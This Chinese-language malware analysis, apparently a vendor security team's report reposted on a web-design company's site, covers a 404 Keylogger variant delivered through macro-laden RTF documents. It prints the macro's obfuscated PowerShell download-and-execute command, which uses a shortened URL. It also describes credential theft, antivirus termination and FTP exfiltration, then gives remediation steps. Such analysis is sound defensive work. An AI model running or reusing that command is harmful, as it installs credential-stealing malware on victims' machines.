404Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

這篇文章將為大家詳細講解有關(guān)404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

成都創(chuàng)新互聯(lián)公司專業(yè)為企業(yè)提供八宿網(wǎng)站建設(shè)、八宿做網(wǎng)站、八宿網(wǎng)站設(shè)計、八宿網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計與制作、八宿企業(yè)網(wǎng)站模板建站服務(wù),十載八宿做網(wǎng)站經(jīng)驗,不只是建網(wǎng)站,更提供有價值的思路和整體網(wǎng)絡(luò)服務(wù)。

深信服安全團隊捕獲到一個最新的404 Keylogger木馬變種,通過OFFICE文檔嵌入惡意宏代碼進行傳播,盜取受害者瀏覽器的網(wǎng)站帳號和密碼,深信服安全團隊對此樣本進行了詳細分析,并獲取到了黑客FTP服務(wù)器的帳號和密碼,請大家提高安全意識,不要輕易打開未知的郵件附件及文檔等。

樣本是一個RTF文檔,里面嵌套了OLE對象,包含惡意宏代碼,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

惡意宏代碼,會啟動PowerShell進程,從遠程服務(wù)器上下載惡意程序,然后執(zhí)行,相關(guān)參數(shù),如下:

powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7 ” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe”

分析下載的惡意程序,使用NET語言進行開發(fā),首先會獲取遠程服務(wù)器地址:hxxps://paste.ee/r/RrkBF,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

讀取遠程服務(wù)器上的內(nèi)容,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

直接加載執(zhí)行遠程服務(wù)器上的腳本,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

解密去混淆遠程服務(wù)器上的腳本之后,同樣是一個NET編寫的程序,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

該程序主要功能是鍵盤記錄,盜取受害者瀏覽器網(wǎng)站上的帳號和密碼,會結(jié)束受害者主機上的瀏覽器相關(guān)進程,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

對抗殺軟,結(jié)束相關(guān)安全軟件進程,相關(guān)的安全軟件進程有一百多個,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

將記錄的瀏覽器上網(wǎng)站,以及相關(guān)的帳號和密碼,然后發(fā)送到黑客遠程FTPd服務(wù)器,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

該惡意程序還有截屏等操作,在分析該惡意程序的時候發(fā)現(xiàn)了黑客的FTP服務(wù)器地址,以及帳號和密碼,登錄進去,發(fā)現(xiàn)它已經(jīng)盜取了部分受害者的主機信息,如下所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

解決方案

病毒檢測查殺

1、深信服EDR產(chǎn)品、下一代防火墻及安全感知平臺等安全產(chǎn)品均具備病毒檢測能力,部署相關(guān)產(chǎn)品用戶可進行病毒檢測,如圖所示:

404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼

2、深信服為廣大用戶免費提供查殺工具,可下載如下工具,進行檢測查殺。

64位系統(tǒng)下載鏈接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系統(tǒng)下載鏈接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

病毒防御

1、及時給電腦打補丁,及時升級應(yīng)用程序,修復(fù)漏洞。

2、不要點擊來源不明的郵件附件,不從不明網(wǎng)站下載軟件。

3、深信服防火墻客戶,建議升級到AF805版本,并開啟人工智能引擎Save,以達到最好的防御效果。

關(guān)于404 Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學(xué)到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

當前名稱:404Keylogger最新木馬是怎樣盜取受害者瀏覽器網(wǎng)站帳號和密碼
文章源于:http://muchs.cn/article24/ishcje.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供品牌網(wǎng)站建設(shè)、品牌網(wǎng)站設(shè)計品牌網(wǎng)站制作、電子商務(wù)、網(wǎng)站設(shè)計公司網(wǎng)站收錄

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

微信小程序開發(fā)